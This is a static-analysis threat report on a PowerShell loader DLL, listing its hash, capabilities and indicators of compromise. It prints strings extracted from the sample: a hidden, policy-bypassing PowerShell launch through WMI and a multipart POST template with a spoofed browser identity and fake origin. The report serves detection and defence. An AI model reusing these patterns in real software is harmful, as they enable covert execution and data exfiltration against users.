Static Analysis - PowerShell Loader DLL | Threat: HIGH

File Identity

SHA256: 05c72e77d14cee079ac94706759dfe77c27fe51731a1eca22b03352190087e9e
Size: 413,424 bytes (PE32 DLL console x86, 6 sections)
Entropy: 6.832 (normal)
Imagebase: Suspicious

PowerShell Hidden Execution

POWERSHELL DROPPER: Hidden PowerShell command execution detected!

process call create "powershell -executionpolicy bypass -nop -w hidden %s"

-- -executionpolicy bypass: skips the PowerShell execution policy
-- -nop: prevents loading the profile file (faster start)
-- -w hidden: runs with a hidden window (the user does not see it)
-- WMI process call create: starts the process through WMI (AV bypass)
-- %s: dynamic payload path (filled in at runtime)

HTTP Multipart POST + Fake Browser Identity

POST %s HTTP/1.0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 Chrome/102.0.5005.61
Origin: http://null.jsbin.com
Referer: http://null.jsbin.com/
------WebKitFormBoundaryYeg3e1XpGtiXfNZD--

-- Fake macOS + Chrome User-Agent: impersonates a Mac browser
-- WebKit form boundary: uploads data as multipart/form-data
-- null.jsbin.com: the null origin of the jsbin.com service = sandbox evasion
-- .tpp0 / .tpp1 extensions: custom payload/temp files

IOC

SHA256: 05c72e77d14cee079ac94706759dfe77c27fe51731a1eca22b03352190087e9e
PowerShell: -executionpolicy bypass -nop -w hidden (WMI launch)
User-Agent: macOS Chrome 102 camouflage
Origin: http://null.jsbin.com (fake)
File ext: .tpp0 / .tpp1 (custom payload extension)

PSLoaderDLL — Malware Profile

PowerShell loader DLL using WMI (process call create) to launch PowerShell with -executionpolicy bypass -nop -w hidden. HTTP multipart POST with macOS Chrome 102 User-Agent camouflage. Fake Origin/Referer: null.jsbin.com. Creates custom .tpp0/.tpp1 files. WebKit form boundary for file uploads.

Malware Type
Loader
Programming Language
C/C++
C2 Protocol
HTTP
Target Systems
Global

Capabilities & Behavior

Payload Download
Process Injection
Modular Architecture
Credential Theft
Lateral Movement
Persistence
Anti-VM/Sandbox
Secondary Payload Distribution

IOC List (1 indicator)

IOC — PSLoaderDLL
# SHA256 05c72e77d14cee079ac94706759dfe77c27fe51731a1eca22b03352190087e9e
Type | Value | Note
sha256 | 05c72e77d14cee079ac94706759dfe77c27fe51731a1eca22b03352190087e9e | (none)
Tags
psloaderdll, wmi-process-call-create-powershell-execution, powershell-executionpolicy-bypass-nop-w-hidden, http-multipart-post-form-upload, macos-chrome-102-user-agent-camouflage, null-jsbin-com-fake-origin-referer, tpp0-tpp1-custom-payload-extensions, webkit-form-boundary-multipart-upload, suspicious-imagebase, virtualAllocExNuma-allocation